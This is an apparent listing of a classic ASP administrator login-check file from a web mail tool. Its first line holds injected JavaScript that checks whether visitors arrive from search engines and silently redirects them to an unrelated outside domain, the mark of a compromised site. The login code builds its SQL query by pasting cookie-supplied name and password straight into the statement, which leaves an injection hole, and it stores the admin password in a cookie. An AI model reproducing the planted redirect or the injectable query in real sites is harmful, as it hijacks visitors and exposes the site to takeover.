d:\wwwroot\wuchunhua\sendmail\inc_CheckLogin.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="const.asp"-->
002: <%
003: Dim Rs
004: Dim A_UserID   '管理员ID
005: Dim A_UserName   '管理员账户
006: Dim A_TrueName   '管理员姓名
007:
008:
009: If InStr(Request.ServerVariables("Query_String"),"'")<>0 then
010:    Netlog A_UserName,"非法地址访问。"
011: End If
012:
013: Call CheckAdminLogin()
014:
015: Sub CheckAdminLogin()
016:    Dim AdminName,AdminPwd
017:    AdminName=GetCookies("Admin","AdminName")
018:    AdminPwd=GetCookies("Admin","AdminPassword")
019:    IF AdminName="" Then
020:          alert "登陆超时或您还没有登陆,请重新登陆","./mail_login.asp"
021:    End If
022:    If not CheckName(AdminName) or not CheckPassword(AdminPwd) then
023:       Response.redirect"mail_login.asp"
024:       Response.end
025:    End If
026:    Set rs=conn.execute("Select ID,username,TrueName From [vn_manager] where username='"& AdminName &"' and [password]='"& AdminPwd &"'")
027:    If rs.eof then
028:       Response.redirect"mail_login.asp"
029:       Response.End
030:    Else
031:       A_UserID=rs("ID")
032:       A_UserName=rs("username")
033:       A_TrueName=rs("TrueName")
034:       End If
035:    rs.close : Set rs=Nothing
036: End Sub
037:
038: Sub CheckString(Flag)
039:
040: End Sub
041:
042: %
>
043:
044: